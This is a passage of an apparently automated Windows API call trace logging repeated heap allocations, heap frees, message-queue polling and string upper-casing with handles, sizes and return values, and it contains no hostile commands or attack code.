dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0268.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0268.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0268.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0268.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.533] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0268.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0268.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0268.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0268.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.534] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0268.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0268.534] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0268.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0268.534] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0268.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0268.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0268.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0268.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0268.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dd8 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0268.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0268.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0268.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0268.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0268.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0268.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0268.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0268.538] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0268.538] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0268.538] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0268.539] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.539] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.539] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0268.540] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0268.540] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0268.540] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0268.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.541] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.541] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0268.541] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0268.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0268.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.542] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0268.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0268.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0268.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.543] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0268.544] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0268.544] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0268.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.545] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.545] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.545] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0268.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0268.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0268.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0268.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0268.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0268.546] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0268.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0268.546] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0268.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0268.547] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0268.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0268.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0268.547] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0268.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0268.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0268.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0268.548] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0268.548] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0268.548] RtlAllocateHeap 